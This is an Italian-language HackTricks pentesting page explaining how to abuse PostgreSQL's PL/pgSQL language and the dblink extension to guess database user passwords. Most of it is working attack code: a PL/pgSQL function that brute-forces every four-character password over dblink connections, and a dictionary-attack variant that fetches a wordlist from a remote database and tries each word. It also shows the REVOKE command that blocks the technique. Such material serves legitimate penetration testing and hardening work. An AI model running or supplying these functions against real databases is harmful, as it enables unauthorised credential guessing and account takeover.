PL/pgSQL Password Bruteforce

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Trova ulteriori informazioni su questi attacchi nel documento originale.

PL/pgSQL è un linguaggio di programmazione completo che si estende oltre le capacità di SQL offrendo controllo procedurale avanzato. Questo include l'utilizzo di cicli e varie strutture di controllo. Le funzioni create nel linguaggio PL/pgSQL possono essere invocate da istruzioni SQL e trigger, ampliando l'ambito delle operazioni all'interno dell'ambiente del database.

Puoi abusare di questo linguaggio per chiedere a PostgreSQL di forzare le credenziali degli utenti, ma deve esistere nel database. Puoi verificarne l'esistenza utilizzando:

SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
lanname | lanacl
---------+---------
plpgsql |

Per impostazione predefinita, creare funzioni è un privilegio concesso a PUBLIC, dove PUBLIC si riferisce a ogni utente su quel sistema di database. Per prevenire ciò, l'amministratore avrebbe dovuto revocare il privilegio di USAGE dal dominio PUBLIC:

REVOKE ALL PRIVILEGES ON LANGUAGE plpgsql FROM PUBLIC;

In tal caso, la nostra query precedente restituirebbe risultati diversi:

SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
lanname | lanacl
---------+-----------------
plpgsql | {admin=U/admin}

Nota che per il seguente script per funzionare la funzione dblink deve esistere. Se non esiste, puoi provare a crearla con

CREATE EXTENSION dblink;

Password Brute Force

Ecco come puoi eseguire un attacco di brute force su una password di 4 caratteri:

//Create the brute-force function
CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT,
username TEXT, dbname TEXT) RETURNS TEXT AS
$$
DECLARE
word TEXT;
BEGIN
FOR a IN 65..122 LOOP
FOR b IN 65..122 LOOP
FOR c IN 65..122 LOOP
FOR d IN 65..122 LOOP
BEGIN
word := chr(a) || chr(b) || chr(c) || chr(d);
PERFORM(SELECT * FROM dblink(' host=' || host ||
' port=' || port ||
' dbname=' || dbname ||
' user=' || username ||
' password=' || word,
'SELECT 1')
RETURNS (i INT));
RETURN word;
EXCEPTION
WHEN sqlclient_unable_to_establish_sqlconnection
THEN
-- do nothing
END;
END LOOP;
END LOOP;
END LOOP;
END LOOP;
RETURN NULL;
END;
$$ LANGUAGE 'plpgsql';

//Call the function
select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');

Nota che anche forzare 4 caratteri potrebbe richiedere diversi minuti.

Puoi anche scaricare una wordlist e provare solo quelle password (attacco a dizionario):

//Create the function
CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT,
username TEXT, dbname TEXT) RETURNS TEXT AS
$$
BEGIN
FOR word IN (SELECT word FROM dblink('host=1.2.3.4
user=name
password=qwerty
dbname=wordlists',
'SELECT word FROM wordlist')
RETURNS (word TEXT)) LOOP
BEGIN
PERFORM(SELECT * FROM dblink(' host=' || host ||
' port=' || port ||
' dbname=' || dbname ||
' user=' || username ||
' password=' || word,
'SELECT 1')
RETURNS (i INT));
RETURN word;

EXCEPTION
WHEN sqlclient_unable_to_establish_sqlconnection THEN
-- do nothing
END;
END LOOP;
RETURN NULL;
END;
$$ LANGUAGE 'plpgsql'

-- Call the function
select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');

Impara e pratica il hacking su AWS:HackTricks Training AWS Red Team Expert (ARTE) Impara e pratica il hacking su GCP: HackTricks Training GCP Red Team Expert (GRTE)

Supporta HackTricks

Last updated